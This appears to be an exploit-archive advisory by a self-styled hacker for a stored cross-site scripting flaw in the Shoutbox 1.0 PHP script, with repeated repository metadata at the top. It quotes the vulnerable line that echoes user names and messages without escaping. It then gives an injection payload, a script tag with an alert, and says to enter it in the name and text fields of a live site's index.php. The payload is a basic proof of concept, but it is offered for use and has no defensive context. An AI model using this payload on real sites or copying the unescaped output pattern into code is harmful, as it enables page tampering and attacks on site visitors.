16 lines
639 B
Text
Executable file
16 lines
639 B
Text
Executable file
# Vulnerable Code in index.php :
|
|
#
|
|
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
|
|
#
|
|
########################################
|
|
# Shoutbox 1.0 HTML / Xss inejction exploit
|
|
# AuTh0r : SKuLL-HacKeR
|
|
# H0ME : Sec-Best & SaudiHack & S3curity-Art
|
|
# Email : My@Hotmail.iT
|
|
########################################
|
|
|
|
Vendor: http://www.plohni.com
|
|
exploit:
|
|
site.com/Shoutbox/index.php
|
|
in the select your name and your text put this code
|
|
'">><script>alert('XSS skh')</script>
|